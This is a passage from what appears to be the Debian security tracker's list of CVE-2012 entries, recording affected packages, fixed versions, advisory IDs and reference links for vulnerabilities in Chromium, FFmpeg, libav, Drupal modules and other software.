[squeeze] - chromium-browser CVE-2012-2825 (The XSL implementation in Google Chrome before 20.0.1132.43 allows ...) - libxslt 1.1.26-13 (low; bug #679283) [squeeze] - libxslt 1.1.26-6+squeeze1 CVE-2012-2824 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2823 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2822 (The PDF functionality in Google Chrome before 20.0.1132.43 allows ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2821 (The autofill implementation in Google Chrome before 20.0.1132.43 does ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2820 (Google Chrome before 20.0.1132.43 does not properly implement SVG ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2819 (The texSubImage2D implementation in the WebGL subsystem in Google ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2818 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2817 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2816 (Google Chrome before 20.0.1132.43 on Windows does not properly isolate ...) - chromium-browser (windows-only) CVE-2012-2815 (Google Chrome before 20.0.1132.43 allows remote attackers to obtain ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser (minor issue) CVE-2012-2814 (Buffer overflow in the exif_entry_format_value function in ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2813 (The exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2812 (The exif_entry_get_value function in exif-entry.c in the EXIF Tag ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2811 RESERVED CVE-2012-2810 RESERVED CVE-2012-2809 RESERVED CVE-2012-2808 RESERVED CVE-2012-2807 (Multiple integer overflows in libxml2, as used in Google Chrome before ...) {DSA-2521-1} - libxml2 2.8.0+dfsg1-5 (bug #679280) NOTE: http://git.chromium.org/gitweb/?p=chromium/src.git;a=patch;h=f183580d61c054f7f6bb35cfe29e1b342390fbebcd CVE-2012-2806 (Heap-based buffer overflow in the get_sos function in jdmarker.c in ...) - libjpeg-turbo (bug #612341) CVE-2012-2805 RESERVED CVE-2012-2804 (Unspecified vulnerability in libavcodec/indeo3.c in FFmpeg before 0.11 ...) - ffmpeg (bug #688849) - libav 6:0.8.5-1 (bug #688847) [squeeze] - ffmpeg (vulnerable code not present) CVE-2012-2803 (Double free vulnerability in the mpeg_decode_frame function in ...) {DSA-2624-1} - ffmpeg (bug #688849) - libav 6:0.8.5-1 (bug #688847) [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) CVE-2012-2802 (Unspecified vulnerability in the ac3_decode_frame function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2801 (Unspecified vulnerability in libavcodec/avs.c in FFmpeg before 0.11, ...) {DSA-2624-1} - libav 6:0.8.4-1 (bug #688847) - ffmpeg [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) CVE-2012-2800 (Unspecified vulnerability in the ff_ivi_process_empty_tile function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2799 (Unspecified vulnerability in libavcodec/wmalosslessdec.c in FFmpeg ...) - libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental) - ffmpeg (Vulnerable code not present) CVE-2012-2798 (Unspecified vulnerability in the decode_dds1 function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2797 (Unspecified vulnerability in the decode_frame_mp3on4 function in ...) - ffmpeg (bug #688849) - libav 6:0.8.5-1 (bug #688847) [squeeze] - ffmpeg (vulnerable code not present) NOTE: patch proposed: http://patches.libav.org/patch/32642/ CVE-2012-2796 (Unspecified vulnerability in the vc1_decode_frame function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2795 (Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in ...) - libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental) - ffmpeg (Vulnerable code not present) CVE-2012-2794 (Unspecified vulnerability in the decode_mb_info function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2793 (Unspecified vulnerability in the lag_decode_zero_run_line function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2792 (Unspecified vulnerability in the decode_init function in ...) - libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental) - ffmpeg (Vulnerable code not present) CVE-2012-2791 (Multiple unspecified vulnerabilities in the (1) decode_band_hdr ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.5-1 (bug #688847) CVE-2012-2790 (Unspecified vulnerability in the read_var_block_data function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2789 (Unspecified vulnerability in the avi_read_packet function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) NOTE: contrary to the description, this issue is about the decode_subframe in libavcodec/wmaprodec.c CVE-2012-2788 (Unspecified vulnerability in the avi_read_packet function in ...) {DSA-2624-1} [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) - libav 6:0.8.4-1 (bug #688847) - ffmpeg CVE-2012-2787 (Unspecified vulnerability in the decode_frame function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2786 (Unspecified vulnerability in the decode_wdlt function in ...) [squeeze] - ffmpeg (bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2785 (Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in ...) - libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental) - ffmpeg (Vulnerable code not present) CVE-2012-2784 (Unspecified vulnerability in the decode_pic function in ...) {DSA-2624-1} [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) - libav 6:0.8.4-1 (bug #688847) - ffmpeg NOTE: duplicate of CVE-2012-2777 TODO: mark this properly as duplicate CVE-2012-2783 (Unspecified vulnerability in libavcodec/vp56.c in FFmpeg before 0.11, ...) {DSA-2624-1} - ffmpeg (bug #688849) - libav 6:0.8.5-1 (bug #688847) [squeeze] - ffmpeg 4:0.5.10-1 (bug #688849) CVE-2012-2782 (Unspecified vulnerability in the decode_slice_header function in ...) - libav (Doesn't affect libav) CVE-2012-2781 RESERVED CVE-2012-2780 RESERVED CVE-2012-2779 (Unspecified vulnerability in the decode_frame function in ...) - ffmpeg [squeeze] - ffmpeg (Vulnerable code not present, bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2778 RESERVED CVE-2012-2777 (Unspecified vulnerability in the decode_pic function in ...) {DSA-2624-1} [squeeze] - ffmpeg 4:0.5.9-1 (bug #688849) - libav 6:0.8.4-1 (bug #688847) - ffmpeg CVE-2012-2776 (Unspecified vulnerability in the decode_cell_data function in ...) - ffmpeg [squeeze] - ffmpeg (Vulnerable code not present, bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2775 (Unspecified vulnerability in the read_var_block_data function in ...) - ffmpeg [squeeze] - ffmpeg (Vulnerable code not present, bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2774 (The ff_MPV_frame_start function in libavcodec/mpegvideo.c in FFmpeg ...) - ffmpeg (there is no crash, just a couple uninitialized reads, harmless according to Janne) - libav (there is no crash, just a couple uninitialized reads, harmless according to Janne) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=59a4b73531428d2f420b4dad545172c8483ced0f NOTE: patch proposed: http://patches.libav.org/patch/32644/ CVE-2012-2773 RESERVED CVE-2012-2772 (Unspecified vulnerability in the ff_rv34_decode_frame function in ...) - ffmpeg [squeeze] - ffmpeg (Vulnerable code not present, bug #688849) - libav 6:0.8.4-1 (bug #688847) CVE-2012-2771 RESERVED CVE-2012-2770 (The Authen::ExternalAuth extension before 0.11 for Best Practical ...) - rt-authen-externalauth 0.10-2 (bug #683288) CVE-2012-2769 (Multiple cross-site scripting (XSS) vulnerabilities in the topic ...) - request-tracker4 4.0.6-1 NOTE: bundled in RT4 CVE-2012-2768 (Multiple cross-site scripting (XSS) vulnerabilities in the topic ...) {DSA-2535-1} - rtfm (bug #683290) - request-tracker4 4.0.6-1 NOTE: bundled in RT4 CVE-2012-2767 RESERVED CVE-2012-2766 RESERVED CVE-2012-2765 RESERVED CVE-2012-2764 (Untrusted search path vulnerability in Google Chrome before ...) - chromium-browser (Windows specific) CVE-2012-2763 (Buffer overflow in the readstr_upto function in ...) - gimp 2.8.0-1 (low) [squeeze] - gimp (Only exploitable in rare setups) NOTE: http://www.openwall.com/lists/oss-security/2012/05/31/1 NOTE: http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html NOTE: http://www.reactionpenetrationtesting.co.uk/advisories/scriptfubof.c CVE-2012-2762 (SQL injection vulnerability in include/functions_trackbacks.inc.php in ...) - serendipity (vulnerable code not present in 1.5.1, see bug #678139) CVE-2012-2761 RESERVED CVE-2012-2760 (mod_auth_openid before 0.7 for Apache uses world-readable permissions ...) - libapache2-mod-auth-openid 0.7-0.1 (low; bug #674165) [squeeze] - libapache2-mod-auth-openid (Minor issue) CVE-2012-2759 (Cross-site scripting (XSS) vulnerability in login-with-ajax.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2012-2758 RESERVED CVE-2012-2757 RESERVED CVE-2012-2756 RESERVED CVE-2012-2755 RESERVED CVE-2012-2754 RESERVED CVE-2012-2753 (Untrusted search path vulnerability in TrGUI.exe in the Endpoint ...) NOT-FOR-US: Endpoint Connect CVE-2012-2752 (Untrusted search path vulnerability in VMware vMA 4.x and 5.x before ...) NOT-FOR-US: VMware CVE-2012-2751 (ModSecurity before 2.6.6, when used with PHP, does not properly handle ...) {DSA-2506-1} - modsecurity-apache 2.6.6-1 (bug #678527) - libapache-mod-security (bug #678529) NOTE: http://www.openwall.com/lists/oss-security/2012/06/22/1 NOTE: http://www.openwall.com/lists/oss-security/2012/06/22/2 CVE-2012-2750 (Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown ...) - mysql-5.5 5.5.24+dfsg-1 CVE-2012-2749 (MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote ...) {DSA-2496-1} - mysql-5.1 - mysql-5.5 5.5.24+dfsg-1 CVE-2012-2748 (Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote ...) - joomla (bug #571794) CVE-2012-2747 (Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote ...) - joomla (bug #571794) CVE-2012-2746 (389 Directory Server before 1.2.11.6 (aka Red Hat Directory Server ...) - 389-ds-base (Fixed before initial upload) CVE-2012-2745 (The copy_creds function in kernel/cred.c in the Linux kernel before ...) - linux 3.2.15-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-46 CVE-2012-2744 (net/ipv6/netfilter/nf_conntrack_reasm.c in the Linux kernel before ...) - linux 2.6.34-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-36 CVE-2012-2743 (Revelation 0.4.13-2 and earlier does not iterate through SHA hashing ...) - revelation 0.4.11-10 (low; bug #633088) [squeeze] - revelation (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2012/06/18/1 CVE-2012-2742 (Revelation 0.4.13-2 and earlier uses only the first 32 characters of a ...) - revelation 0.4.11-10 (bug #633088) [squeeze] - revelation (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2012/06/18/1 CVE-2012-2741 (Cross-site scripting (XSS) vulnerability in public_html/lists/admin/ ...) NOT-FOR-US: phplist CVE-2012-2740 (SQL injection vulnerability in public_html/lists/admin in phpList ...) NOT-FOR-US: phplist CVE-2012-2739 (Oracle Java SE before 7 Update 6, and OpenJDK 7 before 7u6 build 12 ...) - openjdk-6 - openjdk-7 NOTE: http://mail.openjdk.java.net/pipermail/core-libs-dev/2012-May/010238.html NOTE: http://armoredbarista.blogspot.de/2012/02/investigating-hashdos-issue.html NOTE: http://www.openwall.com/lists/oss-security/2012/06/15/12 NOTE: http://www.openwall.com/lists/oss-security/2012/06/17/1 CVE-2012-2738 (The VteTerminal in gnome-terminal (vte) before 0.32.2 allows remote ...) - vte 1:0.28.2-5 (bug #677717) - vte3 1:0.32.2-1 [squeeze] - vte 1:0.24.3-4 CVE-2012-2737 (The user_change_icon_file_authorized_cb function in ...) - accountsservice 0.6.21-6 (bug #679429) NOTE: http://www.openwall.com/lists/oss-security/2012/06/28/9 NOTE: http://cgit.freedesktop.org/accountsservice/commit/?id=69b526a6cd4c078732068de2ba393cf9242a404b NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=832532 CVE-2012-2736 [NetworkManager: creating new WPA-secured wireless network results in insecure network being created instead] RESERVED - network-manager 0.9.4.0-1 (low; bug #655972) [squeeze] - network-manager 0.8.1-6+squeeze2 CVE-2012-2735 (Session fixation vulnerability in Cumin before 0.1.5444, as used in ...) NOT-FOR-US: Cumin CVE-2012-2734 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cumin ...) NOT-FOR-US: Cumin CVE-2012-2733 (java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-1 (bug #692440) CVE-2012-2732 REJECTED CVE-2012-2731 (The Ubercart AJAX Cart 6.x-2.x before 6.x-2.1 for Drupal stores the ...) NOT-FOR-US: Drupal module CVE-2012-2730 (The Protected Node module 6.x-1.x before 6.x-1.6 for Drupal does not ...) NOT-FOR-US: Drupal module CVE-2012-2729 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Drupal module CVE-2012-2728 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Node ...) NOT-FOR-US: Drupal module CVE-2012-2727 (Open redirect vulnerability in the Janrain Capture module 6.x-1.0 and ...) NOT-FOR-US: Drupal module CVE-2012-2726 (Cross-site scripting (XSS) vulnerability in the Protest module 6.x-1.x ...) NOT-FOR-US: Drupal module CVE-2012-2725 (classes/Filter/WhitelistedExternalFilter.php in the Authoring HTML ...) NOT-FOR-US: Drupal module CVE-2012-2724 RESERVED NOT-FOR-US: Drupal module CVE-2012-2723 (Cross-site scripting (XSS) vulnerability in the Maestro module 7.x-1.x ...) NOT-FOR-US: Drupal module CVE-2012-2722 (The node selection interface in the WYSIWYG editor (CKEditor) in the ...) NOT-FOR-US: Drupal module CVE-2012-2721 (The default views in the Organic Groups (OG) module 6.x-2.x before ...) NOT-FOR-US: Drupal module CVE-2012-2720 (The Token Authentication (tokenauth) module 6.x-1.x before 6.x-1.7 for ...) NOT-FOR-US: Drupal module CVE-2012-2719 (The filedepot module 6.x-1.x before 6.x-1.3 for Drupal, when accessed ...) NOT-FOR-US: Drupal module CVE-2012-2718 (SQL injection vulnerability in the Counter module for Drupal allows ...) NOT-FOR-US: Drupal module CVE-2012-2717 (Multiple cross-site scripting (XSS) vulnerabilities in the Mobile ...) NOT-FOR-US: Drupal module CVE-2012-2716 (Cross-site request forgery (CSRF) vulnerability in the Comment ...) NOT-FOR-US: Drupal module CVE-2012-2715 (Cross-site scripting (XSS) vulnerability in the themes_links function ...) NOT-FOR-US: Drupal module CVE-2012-2714 RESERVED NOT-FOR-US: Drupal module CVE-2012-2713 (Cross-site request forgery (CSRF) vulnerability in the BrowserID ...) NOT-FOR-US: Drupal module CVE-2012-2712 (Multiple cross-site scripting (XSS) vulnerabilities in the Search API ...) NOT-FOR-US: Drupal module CVE-2012-2711 (Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy ...) NOT-FOR-US: Drupal module CVE-2012-2710 (Cross-site scripting (XSS) vulnerability in the Zen module 6.x-1.x ...) NOT-FOR-US: Drupal module CVE-2012-2709 REJECTED CVE-2012-2708 (Cross-site scripting (XSS) vulnerability in the ...) NOT-FOR-US: Drupal module CVE-2012-2707 (The Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal does ...) NOT-FOR-US: Drupal module CVE-2012-2706 (Cross-site scripting (XSS) vulnerability in the Post Affiliate Pro ...) NOT-FOR-US: Drupal module CVE-2012-2705 (The filter_titles function in the Smart Breadcrumb module 6.x-1.x ...) NOT-FOR-US: Drupal module CVE-2012-2704 (The Advertisement module 6.x-2.x before 6.x-2.3 for Drupal does not ...) NOT-FOR-US: Drupal Module CVE-2012-2703 (Cross-site scripting (XSS) vulnerability in the Advertisement module ...) NOT-FOR-US: Drupal module CVE-2012-2702 (The Ubercart Product Keys module 6.x-1.x before 6.x-1.1 for Drupal ...) NOT-FOR-US: Drupal module CVE-2012-2701 REJECTED CVE-2012-2700 REJECTED CVE-2012-2699 REJECTED CVE-2012-2698 (Cross-site scripting (XSS) vulnerability in the outputPage function in ...) [squeeze] - mediawiki (bug #677895; only affects experimental version 1.9.0) - mediawiki 1:1.19.1-1 CVE-2012-2697 (Unspecified vulnerability in autofs, as used in Red Hat Enterprise ...) - autofs 5.0.6-1 NOTE: Fixed upstream with "fix paged ldap map read" CVE-2012-2696 (The backend in Red Hat Enterprise Virtualization Manager (RHEV-M) ...) NOT-FOR-US: Red Hat Enterprise Virtualisation CVE-2012-2695 (The Active Record component in Ruby on Rails before 3.0.14, 3.1.x ...) - ruby-activerecord-3.2 3.2.6-1 (bug #675429) CVE-2012-2694 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...) - ruby-activerecord-3.2 3.2.6-1 (bug #675429) CVE-2012-2693 (libvirt, possibly before 0.9.12, does not properly assign USB devices ...) - libvirt 0.9.12-1 (bug #677496) [squeeze] - libvirt (Minor issue) CVE-2012-2692 (MantisBT before 1.2.11 does not check the delete_attachments_threshold ...) {DSA-2500-1} - mantis 1.2.11-1 (bug #676783) CVE-2012-2691 (The mc_issue_note_update function in the SOAP API in MantisBT before ...) - mantis 1.2.11-1 (bug #676783) [squeeze] - mantis (according to maintainer) CVE-2012-2690 (virt-edit in libguestfs before 1.18.0 does not preserve the ...) - libguestfs 1:1.18.0-1 NOTE: Upstream patch https://www.redhat.com/archives/libguestfs/2012-February/msg00034.html NOTE: https://www.redhat.com/archives/libguestfs/2012-February/msg00033.html NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=788642 NOTE: http://www.openwall.com/lists/oss-security/2012/06/11/1 NOTE: http://www.openwall.com/lists/oss-security/2012/06/11/5 CVE-2012-2689 RESERVED CVE-2012-2688 (Unspecified vulnerability in the _php_stream_scandir function in the ...) {DSA-2527-1} - php5 5.4.4-4 (low; bug #683274) CVE-2012-2687 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) - apache2 2.2.22-8 (low) [squeeze] - apache2 2.2.16-6+squeeze8 CVE-2012-2686 (crypto/evp/e_aes_cbc_hmac_sha1.c in the AES-NI functionality in the ...) - openssl 1.0.1e-1 (bug #699889) [squeeze] - openssl (Vulnerable code not present) NOTE: DoS in specific protocol + cpu type combination CVE-2012-2685 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...) NOT-FOR-US: Cumin CVE-2012-2684 (Multiple SQL injection vulnerabilities in the ...) NOT-FOR-US: Cumin CVE-2012-2683 (Multiple cross-site scripting (XSS) vulnerabilities in Cumin before ...) NOT-FOR-US: Cumin CVE-2012-2682 RESERVED CVE-2012-2681 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...) NOT-FOR-US: Cumin CVE-2012-2680 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...) NOT-FOR-US: Cumin CVE-2012-2679 (Red Hat Network (RHN) Configuration Client (rhncfg-client) in rhncfg ...) NOT-FOR-US: Red Hat Network configuration client CVE-2012-2678 (389 Directory Server before 1.2.11.6 (aka Red Hat Directory Server ...) - 389-ds-base (Fixed before initial upload) CVE-2012-2677 (Integer overflow in the ordered_malloc function in boost/pool/pool.hpp ...) - boost1.42 (low; bug #688331) [squeeze] - boost1.42 (Minor issue) - boost1.49 1.49.0-3.1 (low; bug #677197) CVE-2012-2676 (Multiple integer overflows in the (1) malloc and (2) calloc functions ...) NOT-FOR-US: Hoard memory allocator CVE-2012-2675 (Multiple integer overflows in the (1) CallMalloc (malloc) and (2) ...) NOT-FOR-US: nedmalloc CVE-2012-2674 (Multiple integer overflows in the (1) chk_malloc, (2) leak_malloc, and ...) NOT-FOR-US: Android libc CVE-2012-2673 (Multiple integer overflows in the (1) GC_generic_malloc and (2) calloc ...) - libgc 1:7.1-9 (bug #677195) [squeeze] - libgc 1:6.8-2 CVE-2012-2672 (Oracle Mojarra 2.1.7 does not properly "clean up" the FacesContext ...) - mojarra (Only affected in combination with EAP6/AS7 application servers, bug #677194) CVE-2012-2671 (The Rack::Cache rubygem 0.3.0 through 1.1 caches Set-Cookie and other ...) NOTE: https://github.com/rtomayko/rack-cache/blob/master/CHANGES - ruby-rack-cache 1.2-1 CVE-2012-2670 (manageuser.php in Collabtive before 0.7.6 allows remote authenticated ...) - collabtive 0.7.6-1 (bug #676311) NOTE: http://www.securityfocus.com/archive/1/522973/30/0/threaded NOTE: http://xync.org/2012/06/04/Arbitrary-File-Upload-in-Collabtive.html NOTE: http://www.collabtive.o-dyn.de/blog/?p=426 CVE-2012-2669 (The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as ...) - linux 3.2.23-1 [squeeze] - linux-2.6 (userspace daemon not yet present) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=761200 CVE-2012-2668 (libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31 and earlier, ...) - openldap (OpenLDAP in Debian uses GNUTLS instead of Mozilla NSS) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=825875 NOTE: http://www.openldap.org/its/index.cgi?findid=7285 NOTE: http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commit;h=2c2bb2e CVE-2012-2667 (Session fixation vulnerability in ...) NOT-FOR-US: Symfony NOTE: https://bugs.gentoo.org/show_bug.cgi?id=418427 NOTE: http://symfony.com/blog/security-release-symfony-1-4-18-released NOTE: http://trac.symfony-project.org/browser/tags/RELEASE_1_4_18/CHANGELOG NOTE: http://trac.symfony-project.org/changeset/33466?format=diff&new=33466 CVE-2012-2666 RESERVED CVE-2012-2665 (Multiple heap-based buffer overflows in the XML manifest encryption ...) {DSA-2520-1} - libreoffice 1:3.5.4-7 - openoffice.org 1:3.3.0-1 NOTE: Since 3.3.0 openoffice.org is a transitional source package CVE-2012-2664 (The sosreport utility in the Red Hat sos package before 2.2-29 does ...) NOT-FOR-US: sosreport (Red Hat tool) CVE-2012-2663 RESERVED - iptables (unimportant; bug #675445) CVE-2012-2662 (Multiple cross-site scripting (XSS) vulnerabilities in Red Hat ...) NOT-FOR-US: Red Hat Certificate System CVE-2012-2661 (The Active Record component in Ruby on Rails 3.0.x before 3.0.13, ...) - rails (Doesn't affects RoR in Squeeze) - ruby-activerecord-3.2 3.2.6-1 (bug #675396; bug #675429) NOTE: http://seclists.org/oss-sec/2012/q2/448 CVE-2012-2660 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...) - ruby-activerecord-3.2 3.2.6-1 (bug #675429) NOTE: http://seclists.org/oss-sec/2012/q2/449 CVE-2012-2659 RESERVED CVE-2012-2658 (** DISPUTED ** ...) - unixodbc (unimportant; bug #675058) NOTE: Only triggerable by trusted input, not a security issue CVE-2012-2657 (** DISPUTED ** ...) - unixodbc (unimportant; bug #675058) NOTE: Only triggerable by trusted input, not a security issue CVE-2012-2656 [XXE vulnerability in Restlet] RESERVED - restlet (bug #596472) CVE-2012-2655 (PostgreSQL 8.3.x before 8.3.19, 8.4.x before 8.4.12, 9.0.x before ...) {DSA-2491-1} - postgresql-9.1 9.1.4-1 - postgresql-8.4 8.4.12-1 CVE-2012-2654 (The (1) EC2 and (2) OS APIs in OpenStack Compute (Nova) Folsom ...) - nova 2012.1-6 (bug #676465) CVE-2012-2653 (arpwatch 2.1a15, as used by Red Hat, Debian, Fedora, and possibly ...) {DSA-2481-1} - arpwatch 2.1a15-1.2 (bug #674715) NOTE: Debian build includes the vulnerable patch (in .diff.gz) CVE-2012-2652 (The bdrv_open function in Qemu 1.0 does not properly handle the ...) {DSA-2545-1 DSA-2542-1} - qemu 1.1.0+dfsg-1 (bug #678280) - qemu-kvm 1.1.0+dfsg-1 CVE-2012-2651 RESERVED CVE-2012-2650 RESERVED CVE-2012-2649 (The Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile ...) NOT-FOR-US: Sleipnir Mobile CVE-2012-2648 (Cross-site scripting (XSS) vulnerability in the GoodReader app 3.16 ...) NOT-FOR-US: GoodReader CVE-2012-2647 (Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote ...) NOT-FOR-US: Yahoo! Toolbar CVE-2012-2646 (The Sleipnir Mobile application before 2.1.0 and Sleipnir Mobile Black ...) NOT-FOR-US: Sleipnir Mobile CVE-2012-2645 (The Yahoo! Japan Yahoo! Browser application 1.2.0 and earlier for ...) NOT-FOR-US: The Yahoo! Japan Yahoo! Browser application CVE-2012-2644 (Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 ...) NOT-FOR-US: Movable Type MT4i plugin CVE-2012-2643 (Cross-site scripting (XSS) vulnerability in KENT-WEB YY-BOARD before ...) NOT-FOR-US: KENT-WEB YY-BOARD CVE-2012-2642 (Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 ...) NOT-FOR-US: Movable Type MT4i plugin CVE-2012-2641 (Cross-site scripting (XSS) vulnerability in Zenphoto before 1.4.3 ...) NOT-FOR-US: Zenphoto CVE-2012-2640 (The NEC BIGLOBE Yome Collection application 1.8.3 and earlier for ...) NOT-FOR-US: The NEC BIGLOBE Yome Collection CVE-2012-2639 REJECTED CVE-2012-2638 (Cross-site scripting (XSS) vulnerability in SmallPICT.cgi in SmallPICT ...) NOT-FOR-US: SmallPICT CVE-2012-2637 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 ...) NOT-FOR-US: KENT-WEB WEB PATIO CVE-2012-2636 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 ...) NOT-FOR-US: KENT-WEB WEB PATIO CVE-2012-2635 (The Dolphin Browser HD application before 7.6 and Dolphin for Pad ...) NOT-FOR-US: Dolphin CVE-2012-2634 (Cross-site scripting (XSS) vulnerability in FeedDemon before 4.0, when ...) NOT-FOR-US: FeedDemon CVE-2012-2633 (Cross-site scripting (XSS) vulnerability in wassup.php in the WassUp ...) NOT-FOR-US: WassUp CVE-2012-2632 (SEIL routers with firmware SEIL/x86 1.00 through 2.35, SEIL/X1 2.30 ...) NOT-FOR-US: SEIL routers CVE-2012-2631 (Cross-site scripting (XSS) vulnerability in WEBLOGIC @WEB ShoppingCart ...) NOT-FOR-US: WEBLOGIC CVE-2012-2630 (The Puella Magi Madoka Magica iP application 1.05 and earlier for ...) NOT-FOR-US: Puella Magi Madoka Magica iP (Android application) CVE-2012-2629 RESERVED CVE-2012-2628 RESERVED CVE-2012-2627 (d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell ...) NOT-FOR-US: Plixer Scrutinizer CVE-2012-2626 (cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell ...) NOT-FOR-US: Plixer Scrutinizer CVE-2012-2625 (The PyGrub boot loader in Xen unstable before changeset ...) {DSA-2636-1} - xen 4.1.3-4 (low; bug #688125) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-2625 CVE-2012-2624 RESERVED CVE-2012-XXXX [two XSS] - spip 2.1.14-1 (low; bug #672961) [squeeze] - spip 2.1.1-3squeeze4 CVE-2012-1675 (The TNS Listener, as used in Oracle Database 11g 11.1.0.7, 11.2.0.2, ...) NOT-FOR-US: Oracle Database CVE-2012-2623 RESERVED CVE-2012-2622 RESERVED CVE-2012-2621 RESERVED CVE-2012-2620 RESERVED CVE-2012-2619 (The Broadcom BCM4325 and BCM4329 Wi-Fi chips, as used in certain Acer, ...) - firmware-nonfree (Affects different chipset combination, see bug #694716) CVE-2012-2618 RESERVED CVE-2012-2617 RESERVED CVE-2012-2616 RESERVED CVE-2012-2615 REJECTED CVE-2012-2614 (Buffer overflow in programmer.exe in Lattice Diamond Programmer 1.4.2 ...) NOT-FOR-US: Lattice Diamond Programmer CVE-2012-2613 RESERVED CVE-2012-2612 (The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2611 (The DiagTraceR3Info function in the Dialog processor in disp+work.exe ...) NOT-FOR-US: SAP NetWeaver CVE-2012-2610 RESERVED CVE-2012-2609 RESERVED CVE-2012-2608 RESERVED CVE-2012-2607 (The Johnson Controls CK721-A controller with firmware before ...) NOT-FOR-US: The 